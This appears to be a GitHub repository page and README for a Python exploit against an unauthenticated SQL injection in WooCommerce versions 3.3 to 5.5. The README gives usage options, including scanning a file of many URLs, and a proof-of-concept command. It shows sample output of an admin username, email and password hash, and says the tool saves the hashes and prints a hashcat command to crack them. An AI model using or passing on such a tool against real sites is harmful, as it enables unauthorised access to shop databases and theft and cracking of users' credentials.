https://github.com/randomrobbiebf/woo
Exploit woocommerce SQLI and grab user and password hash
https://github.com/randomrobbiebf/woo
Last synced: 11 months ago
JSON representation
Exploit woocommerce SQLI and grab user and password hash
- Host: GitHub
- URL: https://github.com/randomrobbiebf/woo
- Owner: RandomRobbieBF
- Created: 2021-07-20T14:34:55.000Z (over 4 years ago)
- Default Branch: main
- Last Pushed: 2021-07-30T08:45:34.000Z (over 4 years ago)
- Last Synced: 2025-01-21T05:41:44.358Z (about 1 year ago)
- Language: Python
- Size: 5.86 KB
- Stars: 2
- Watchers: 2
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Woocommerce 3.3 to 5.5 - Unauthenticated SQL Injection
https://wpscan.com/vulnerability/1212fec8-1fde-41e5-af70-abdd7ffe5379
Exploit woocommerce SQLI and grab user and password hash
Commands
---
```
usage: woo.py [-h] [-u URL] [-f FILE] [-p PROXY] [-i WID]
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL URL to test
-f FILE, --file FILE File of urls
-p PROXY, --proxy PROXY
Proxy for debugging
-i WID, --wid WID User ID of User
```
POC
---
```
python3 woo.py -u https://www.website.com -i 1
```
```
Admin ID: 2
Admin Username: admin@website.com
Admin Email Address: admin@admin.com
Admin Password Hash:$P$BIAtNs11r0CBJZxa3B1JLrFd5C9f7r/
```
everytime this is ran it writes the hashs to wphash.has and gives you a hash cat command to crack them